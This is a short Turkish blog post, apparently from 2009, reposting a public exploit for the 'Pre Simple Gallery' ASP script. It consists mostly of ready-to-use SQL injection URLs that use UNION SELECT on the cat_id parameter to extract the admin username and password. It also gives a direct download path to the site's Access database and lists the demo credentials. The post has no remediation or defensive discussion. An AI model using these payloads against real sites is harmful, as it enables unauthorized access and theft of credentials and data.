Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns
Link 1 : http://packetstormsecurity.org/0812-exploits/presimple-sqldisclose.txt
Link 2 : http://www.exploiter5.com/all.php?id=46
Discovered : Public Version
Exploit For Demo :
You Go This Link :
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin
Right Click To on Photo and You Must See
http://preproject.com/pgallery/pimages/4
Column Number 4
And You Go This Links
username:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
password:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
So For Demo :
username: admin
password: admin
Exploit For Demo : (DD)
http://preproject.com/pgallery/database/photo.mdb
14 Haziran 2009 Pazar
Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns
Gönderen SaruHan zaman: 6:24:00 ÖÖ
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder